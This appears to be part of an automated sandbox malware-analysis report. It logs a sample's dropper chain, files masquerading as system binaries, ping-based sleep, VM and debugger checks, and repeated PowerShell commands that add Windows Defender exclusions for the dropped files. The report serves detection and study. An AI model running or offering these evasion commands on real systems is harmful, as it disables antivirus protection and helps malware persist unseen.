Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Memory allocated: 1880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Memory allocated: 1B390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Memory allocated: F50000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Memory allocated: 1AE00000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Memory allocated: 1720000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Memory allocated: 1B3C0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Memory allocated: E00000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Memory allocated: 1AC50000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Memory allocated: 16D0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Memory allocated: 1B190000 memory reserve \| memory write watch
Source: C:\Users\Default\Pictures\smss.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch
Source: C:\Users\Default\Pictures\smss.exe	Memory allocated: 1ACD0000 memory reserve \| memory write watch
Source: C:\Users\Default\Pictures\smss.exe	Memory allocated: 2FA0000 memory reserve \| memory write watch
Source: C:\Users\Default\Pictures\smss.exe	Memory allocated: 1AFA0000 memory reserve \| memory write watch
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Memory allocated: C40000 memory reserve \| memory write watch
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Memory allocated: 1A850000 memory reserve \| memory write watch
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Memory allocated: 18C0000 memory reserve \| memory write watch
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Memory allocated: 1B3B0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Memory allocated: 12B0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Memory allocated: 1ADD0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Memory allocated: B20000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Memory allocated: 1A650000 memory reserve \| memory write watch

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\smss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\smss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1540
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1816
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1984
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1786
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2086
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2069

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ubytutlp.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aRvfEXBg.log	Jump to dropped file
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IxkHGSFL.log	Jump to dropped file

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe TID: 5424	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe TID: 7880	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe TID: 7660	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe TID: 7912	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe TID: 7956	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\Pictures\smss.exe TID: 7888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\Pictures\smss.exe TID: 7944	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224	Thread sleep count: 1540 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4156	Thread sleep count: 1816 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1976	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228	Thread sleep count: 1984 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608	Thread sleep count: 1786 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236	Thread sleep count: 2086 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316	Thread sleep count: 2069 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -922337203685477s >= -30000s
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe TID: 7928	Thread sleep time: -922337203685477s >= -30000s
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe TID: 7972	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe TID: 7948	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe TID: 8036	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\Pictures\smss.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\Pictures\smss.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_0069A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0069A69B
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006AC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_006AC220
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006BB348 FindFirstFileExA,	0_2_006BB348

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Code function: 0_2_006AE6A3 VirtualQuery,GetSystemInfo,

0_2_006AE6A3

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\smss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\smss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Source: 4t8f8F3uT1.exe, 00000000.00000003.2139031912.0000000002983000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}K*
Source: ComwebDriverbroker.exe, 00000005.00000002.2294861588.000000001BE28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000002.00000003.2156804471.0000000002B58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\6}C
Source: 4t8f8F3uT1.exe, 00000000.00000003.2139031912.0000000002983000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\7*ja

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

API call chain: ExitProcess graph end node

graph_0-25079

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Code function: 0_2_006AF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_006AF838

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Code function: 0_2_006B7DEE mov eax, dword ptr fs:[00000030h]

0_2_006B7DEE

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Code function: 0_2_006BC030 GetProcessHeap,

0_2_006BC030

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Process token adjusted: Debug
Source: C:\Users\Default\Pictures\smss.exe	Process token adjusted: Debug
Source: C:\Users\Default\Pictures\smss.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process token adjusted: Debug
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006AF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006AF838
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006AF9D5 SetUnhandledExceptionFilter,	0_2_006AF9D5
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006AFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_006AFBCA
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006B8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006B8EBD

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe'
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'	Jump to behavior

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portcomSurrogateRefSession\QCNKuiZnAzlCwEFS5hObRT3t8.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portcomSurrogateRefSession\b85BZX0R6chhd0.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe "C:\portcomSurrogateRefSession/ComwebDriverbroker.exe"	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline"	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.cmdline"	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HpNAzDiYON.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAB2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC5F50EFF8B17D43B99D465AE8464D9.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD70.tmp" "c:\Windows\System32\CSCE93499D36A1149A8864C8A5B6E525A2.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Code function: 0_2_006AF654 cpuid

0_2_006AF654

